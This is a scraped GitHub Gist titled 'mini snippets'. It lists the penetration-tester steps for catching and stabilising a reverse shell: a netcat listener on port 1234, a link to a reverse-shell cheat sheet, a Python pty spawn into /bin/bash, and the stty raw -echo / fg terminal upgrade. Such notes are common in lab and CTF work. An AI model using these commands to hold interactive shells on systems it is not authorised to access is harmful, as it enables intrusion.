Last active
March 13, 2018 20:11
-
-
Save markedagain/b84b0d4353a4f8076e2adc3bb34c6fa8 to your computer and use it in GitHub Desktop.
mini snippets
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
nc -lvnp 1234 | |
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
python -c 'import pty;pty.spawn("/bin/bash");' | |
ctrl + z | |
stty raw -echo | |
fg |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment